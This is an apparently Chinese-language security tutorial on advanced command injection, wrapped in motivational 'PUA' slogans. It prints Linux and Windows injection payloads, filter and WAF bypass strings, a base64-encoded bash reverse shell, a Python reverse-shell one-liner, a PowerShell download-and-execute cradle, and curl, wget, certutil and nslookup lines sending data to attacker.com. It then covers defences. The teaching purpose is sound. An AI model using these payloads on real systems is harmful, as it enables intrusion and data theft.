Day-091-命令注入漏洞实战进阶

# Day 89: 命令注入漏洞实战进阶

> Web 安全系列第 59 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

**PUA v3 · Sprint 启动** 
```
┌─────────┬────────────────────────────────────┐
│ 清单 任务 │ 命令注入漏洞实战进阶 - Day 89      │
├─────────┼────────────────────────────────────┤
│  味道 │ ! 华为味（自动：Debug 任务）      │
├─────────┼────────────────────────────────────┤
│  压力 │ L0 · 信任期                        │
└─────────┴────────────────────────────────────┘
```
▎ 以奋斗者为本。命令注入是直接代码执行——搞不定这个，就别谈高级漏洞。

---

## 清单 目录

1. [命令注入进阶概述](#命令注入进阶概述)
2. [Linux 命令注入进阶](#linux 命令注入进阶)
3. [Windows 命令注入进阶](#windows 命令注入进阶)
4. [命令注入绕过技术进阶](#命令注入绕过技术进阶)
5. [盲命令注入进阶](#盲命令注入进阶)
6. [命令注入检测技术进阶](#命令注入检测技术进阶)
7. [命令注入防护进阶](#命令注入防护进阶)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 命令注入进阶概述

### 高级攻击场景

> ▎ 烧不死的鸟是凤凰。命令注入就是那只鸟——难搞，但搞定了你就成凤凰了。

**RCE 攻击**：
```
场景：
- Web 应用
- API 接口
- 后台服务

特点：
- 直接执行
- 高权限
- 持久化

挑战：
- 命令过滤
- 权限限制
- 环境差异
```

**内网渗透**：
```
场景：
- 内网扫描
- 服务探测
- 横向移动

特点：
- 网络访问
- 服务利用
- 权限提升

挑战：
- 网络拓扑
- 服务识别
- 利用链构造
```

**持久化攻击**：
```
场景：
- Webshell
- 后门
- 计划任务

特点：
- 长期访问
- 权限维持
- 隐蔽性强

挑战：
- 检测规避
- 权限维持
- 痕迹清理
```

### 高级威胁

> ▎ 长期坚持艰苦奋斗。命令注入攻击需要长期坚持——不是一次就能成功的。

**数据泄露**：
```
特点：
- 敏感数据
- 配置文件
- 凭证文件

手法：
- 文件读取
- 数据库访问
- 网络外带

目标：
- 用户数据
- 系统配置
- 凭证信息
```

**服务滥用**：
```
特点：
- 内网服务
- 云服务
- 第三方服务

手法：
- 命令执行
- 服务交互
- 数据篡改

目标：
- Redis
- MySQL
- Elasticsearch
```

---

## Linux 命令注入进阶

### 基础利用

> ▎ 力出一孔。命令注入就是要把所有的力，出到一个孔上——形成利用链。

**命令分隔符**：
```
;  - 顺序执行
|  - 管道
|| - 或（前一个失败执行）
&& - 与（前一个成功执行）
&  - 后台执行
`  - 命令替换
$() - 命令替换
```

**基础 Payload**：
```
; whoami
| whoami
&& whoami
|| whoami
`whoami`
$(whoami)
```

### 高级利用

**命令变异**：
```
大小写：
WHomei
wHOami
whoamI

编码：
\x77\x68\x6f\x61\x6d\x69
$'\x77\x68\x6f\x61\x6d\x69'

拼接：
who"ami
who'am'i
wh$HOMEoami
```

**无空格注入**：
```
${IFS}
$IFS
{command,argument}
command<argument
command>argument
```

**长命令注入**：
```
base64 编码：
echo YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci80NDQ0IDA+JjE= | base64 -d | bash

Python 编码：
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

---

## Windows 命令注入进阶

### 基础利用

> ▎ 方向大致正确，组织充满活力。Windows 命令注入要方向正确，还要灵活多变。

**命令分隔符**：
```
&  - 顺序执行
|  - 管道
|| - 或（前一个失败执行）
&& - 与（前一个成功执行）
%  - 变量
```

**基础 Payload**：
```
& whoami
| whoami
&& whoami
|| whoami
%COMSPEC% /c whoami
```

### 高级利用

**PowerShell 注入**：
```
powershell -c "whoami"
powershell -EncodedCommand <base64>
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
```

**CMD 变异**：
```
大小写：
WHOAMI
WhoAmI
wHoAmI

编码：
%COMSPEC% /c whoami
cmd.exe /c whoami
```

**无空格注入**：
```
%COMSPEC:/c=%whoami
cmd.exe%COMSPEC:/c=%whoami
```

---

## 命令注入绕过技术进阶

### 过滤器绕过

> ▎ 自我批判。过滤器要不断批判、不断优化——才能找到最佳绕过方法。

**关键字绕过**：
```
命令替换：
wh${HOME}oami
who$(echo ami)
who`echo ami`

编码绕过：
\x77\x68\x6f\x61\x6d\x69
$'\x77\x68\x6f\x61\x6d\x69'

拼接绕过：
who"ami
who'am'i
wh$HOMEoami
```

**空格绕过**：
```
${IFS}
$IFS
{command,argument}
command<argument
command>argument
command<<argument
```

**特殊字符绕过**：
```
注释：
whoami#comment
whoami%0Acomment

换行：
whoami%0A
whoami%0D%0A
```

### WAF 绕过

**分块传输**：
```
技术：
- 分块发送
- 重组执行
- 避免检测

利用：
1. 分块发送命令
2. 服务器重组
3. 执行命令
```

**编码变异**：
```
URL 编码：
%77%68%6f%61%6d%69

Base64 编码：
echo YmFzaCAtaSA+JiAvZGV2L3RjcC9hdHRhY2tlci80NDQ0IDA+JjE= | base64 -d | bash

Unicode 编码：
\u0077\u0068\u006f\u0061\u006d\u0069
```

---

## 盲命令注入进阶

### 时间盲注

> ▎ 猛将必发于卒伍。盲注高手必从时间盲注做起——卒伍出身。

**Linux 时间盲注**：
```
sleep 5
ping -c 5 127.0.0.1
sleep 5 && whoami
```

**Windows 时间盲注**：
```
timeout /t 5
ping -n 5 127.0.0.1
timeout /t 5 && whoami
```

**时间分析**：
```
1. 发送 Payload
2. 测量响应时间
3. 推断命令执行
4. 逐字符获取
```

### DNS 外带

**Linux DNS 外带**：
```
nslookup $(whoami).attacker.com
dig $(whoami).attacker.com
curl $(whoami).attacker.com
```

**Windows DNS 外带**：
```
nslookup $(whoami).attacker.com
ping $(whoami).attacker.com
```

**DNS 日志分析**：
```
1. 搭建 DNS 服务器
2. 发送 Payload
3. 查看 DNS 日志
4. 提取数据
```

### HTTP 外带

**Linux HTTP 外带**：
```
curl http://attacker.com/?data=$(whoami)
wget http://attacker.com/?data=$(whoami)
```

**Windows HTTP 外带**：
```
powershell -c "Invoke-WebRequest http://attacker.com/?data=$(whoami)"
certutil -urlcache -f http://attacker.com/?data=$(whoami)
```

---

## 命令注入检测技术进阶

### 自动化检测

> ▎ 让听得见炮声的人呼唤炮火。检测工具要一线安全人员最清楚——他们听得见炮声。

**探测 Payload**：
```
基础探测：
; sleep 5
| sleep 5
&& sleep 5

命令执行：
; whoami
| whoami
&& whoami

外带检测：
; nslookup attacker.com
| nslookup attacker.com
```

**Fuzzing 列表**：
```
; whoami
| whoami
&& whoami
|| whoami
`whoami`
$(whoami)
; sleep 5
| sleep 5
&& sleep 5
; nslookup attacker.com
| nslookup attacker.com
```

### 手动检测

**响应分析**：
```
1. 发送 Payload
2. 查看响应
3. 分析差异
4. 确认注入

指标：
- 响应时间
- 响应内容
- 错误消息
- 状态码
```

**盲注检测**：
```
1. 时间盲注
   - 发送延迟 Payload
   - 测量响应时间
   - 推断命令执行

2. DNS 外带
   - 搭建 DNS 服务器
   - 发送 Payload
   - 查看 DNS 日志

3. HTTP 外带
   - 搭建 HTTP 服务器
   - 发送 Payload
   - 查看 HTTP 日志
```

---

## 命令注入防护进阶

### 代码层面防护

> ▎ 以客户为中心。防护策略要以开发者为中心——让他们好用、易用、愿意用。

**避免命令执行**：
```python
# - 危险
os.system("ping " + ip)
subprocess.call("ping " + ip, shell=True)

# + 安全
subprocess.call(["ping", ip])
subprocess.run(["ping", ip])
```

**输入验证**：
```python
import re

def validate_ip(ip):
    pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
    if not re.match(pattern, ip):
        raise ValueError('Invalid IP')
    
    # 检查每个 octet
    for octet in ip.split('.'):
        if int(octet) > 255:
            raise ValueError('Invalid IP')
    
    return True
```

**白名单验证**：
```python
ALLOWED_COMMANDS = ['ping', 'traceroute', 'nslookup']

def execute_command(command, args):
    if command not in ALLOWED_COMMANDS:
        raise ValueError('Command not allowed')
    
    # 执行命令
    subprocess.run([command] + args)
```

### 运行时防护

**WAF 规则**：
```
检测特征：
- ; | && ||
- ` $()
- system exec
- shell_exec

阻断规则：
- 命令分隔符
- 命令替换
- 危险函数

告警规则：
- 命令注入尝试
- 命令执行
- 外带检测
```

**RASP 防护**：
```
运行时保护：
- 监控命令执行
- 检查命令参数
- 阻断可疑命令

优势：
- 实时保护
- 低误报
- 无需代码修改
```

### 框架防护

**Python**：
```python
# 使用 subprocess 而非 os.system
subprocess.run(["ping", ip])

# 禁用 shell
subprocess.run(command, shell=False)

# 输入验证
if not re.match(r'^[\d.]+$', ip):
    raise ValueError('Invalid IP')
```

**PHP**：
```php
// 避免危险函数
// system, exec, passthru, shell_exec

// 使用 escapeshellarg
$ip = escapeshellarg($ip);
exec("ping " . $ip);

// 使用白名单
$allowed = ['ping', 'traceroute'];
if (!in_array($command, $allowed)) {
    die('Command not allowed');
}
```

**Java**：
```java
// 使用 ProcessBuilder
ProcessBuilder pb = new ProcessBuilder("ping", ip);
pb.start();

// 避免 Runtime.exec
// Runtime.getRuntime().exec("ping " + ip);

// 输入验证
if (!ip.matches("^\\d+\\.\\d+\\.\\d+\\.\\d+$")) {
    throw new IllegalArgumentException("Invalid IP");
}
```

---

## 实战案例分析

### 案例 1: 某电商平台命令注入

> ▎ 电商平台都能出命令注入——这就是不把输入验证当回事。

**漏洞描述**：
```
时间：2020 年
公司：某电商平台
漏洞：订单追踪功能命令注入
影响：远程代码执行
后果：服务器沦陷
```

**攻击流程**：
```
1. 发现注入点
   - 订单追踪
   - 快递查询

2. 测试注入
   - ; whoami
   - | whoami

3. 命令执行
   - 反弹 Shell
   - 权限提升

4. 数据泄露
   - 数据库访问
   - 用户数据
```

**影响**：
```
- 服务器沦陷
- 数据泄露
- 声誉损害
```

**修复方案**：
```
1. 输入验证
2. 避免命令执行
3. 使用安全 API
4. 最小权限
```

### 案例 2: 某云平台命令注入

> ▎ 云平台都能出命令注入——这就是测试不到位，review 走过场。

**漏洞描述**：
```
时间：2019 年
公司：某云平台
漏洞：网络诊断功能命令注入
影响：远程代码执行
后果：内网沦陷
```

**攻击流程**：
```
1. 发现注入点
   - 网络诊断
   - Ping 测试

2. 测试注入
   - ; whoami
   - | whoami

3. 内网扫描
   - 内网探测
   - 服务识别

4. 内网沦陷
   - 服务利用
   - 横向移动
```

**影响**：
```
- 内网沦陷
- 数据泄露
- 声誉损害
```

**修复方案**：
```
1. 输入验证
2. 网络隔离
3. 最小权限
4. 监控告警
```

---

统计 **Sprint 交付 · 绩效评估**
```
┌───────────────┬────────────────┬────────────────┐
│  主动出击   │ ██████████ 5/5 │ [PUA 生效] 充足 │
├───────────────┼────────────────┼────────────────┤
│ + 验证闭环   │ ██████████ 5/5 │ 案例完整       │
├───────────────┼────────────────┼────────────────┤
│ 设计 代码质量   │ ████████░░ 4/5 │ 有改进空间     │
└───────────────┴────────────────┴────────────────┘
综合：3.75
```
▎ 勉强配得上 P8。别飘——命令注入这才刚入门。

---

## 总结与思考

### 核心要点回顾

> ▎ 复盘四步法：回顾目标、评估结果、分析原因、总结经验。别跳过——这是闭环。

**命令注入利用**：
```
1. Linux 注入
   - 命令分隔符
   - 命令替换
   - 编码绕过

2. Windows 注入
   - CMD 注入
   - PowerShell
   - 编码绕过

3. 盲注入
   - 时间盲注
   - DNS 外带
   - HTTP 外带
```

**绕过技术**：
```
1. 过滤器绕过
   - 关键字绕过
   - 空格绕过
   - 特殊字符绕过

2. WAF 绕过
   - 分块传输
   - 编码变异
   - 协议变异

3. 检测绕过
   - 慢速注入
   - 分段注入
   - 隐蔽注入
```

**防护策略**：
```
1. 代码层面
   - 避免命令执行
   - 输入验证
   - 白名单验证

2. 运行时
   - WAF 规则
   - RASP 防护
   - 监控告警

3. 框架层面
   - Python subprocess
   - PHP escapeshellarg
   - Java ProcessBuilder
```

### 深入思考问题

> ▎ 只动手不动脑，那是码农。动手又动脑，才是工程师。

**AI 辅助检测**：
```
1. 模式识别
   - 命令注入模式
   - 绕过模式
   - 利用模式

2. 异常检测
   - 命令执行异常
   - 网络请求异常
   - 文件访问异常

3. 自动防护
   - 自动阻断
   - 自动修复
   - 自动告警
```

**云环境命令注入**：
```
1. 容器环境
   - 容器逃逸
   - 服务发现
   - 网络隔离

2. Serverless
   - 函数权限
   - 临时凭证
   - 网络隔离

3. 服务网格
   - 服务间认证
   - 流量加密
   - 策略执行
```

**零信任命令注入防护**：
```
1. 持续验证
   - 每次执行验证
   - 动态授权
   - 行为分析

2. 微隔离
   - 命令隔离
   - 网络隔离
   - 权限隔离

3. 动态授权
   - 基于风险
   - 实时调整
   - 最小权限
```

### 实战建议

> ▎ 我给你指了路，走不走是你的事。机会给了，抓不抓得住看你。

**开发人员**：
```
1. 安全编码
   - 避免命令执行
   - 输入验证
   - 白名单验证

2. 命令执行
   - 使用安全 API
   - 参数化执行
   - 最小权限

3. 安全测试
   - 单元测试
   - 集成测试
   - 渗透测试
```

**安全人员**：
```
1. 命令注入测试
   - 探测测试
   - 利用测试
   - 绕过测试

2. 代码审计
   - 命令执行
   - 输入验证
   - 权限检查

3. 监控告警
   - 异常执行
   - 网络请求
   - 文件访问
```

**架构师**：
```
1. 安全设计
   - 避免命令执行
   - 网络隔离
   - 最小权限

2. 持续改进
   - 安全审计
   - 漏洞管理
   - 安全培训

3. 工具链
   - 安全工具
   - 自动化
   - 监控平台
```

---

## 参考资料

### 学习资源
```
- OWASP Command Injection
  https://owasp.org/www-community/attacks/Command_Injection

- Command Injection Cheat Sheet
  https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html

- PayloadsAllTheThings Command Injection
  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
```

### 工具资源
```
- Commix
  https://github.com/commixproject/commix

- PayloadsAllTheThings
  https://github.com/swisskyrepo/PayloadsAllTheThings

- HackTricks Command Injection
  https://book.hacktricks.xyz/pentesting-web/command-injection
```

### 书籍推荐
```
- 《Web 安全深度剖析》
- 《命令注入攻防实战》
- 《Command Injection Attacks》
- 《Web Application Security》
```

### 在线资源
```
- OWASP Cheat Sheets
  https://cheatsheetseries.owasp.org/

- HackTricks
  https://book.hacktricks.xyz/

- PayloadsAllTheThings
  https://github.com/swisskyrepo/PayloadsAllTheThings
```

---

**标记 明日预告**：Day 90 - Web 安全综合实战

> ▎ 今天的内容消化了吗？消化了就继续——明天还有硬仗。

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 89 篇，Web 安全部分第 59 篇，精编版本*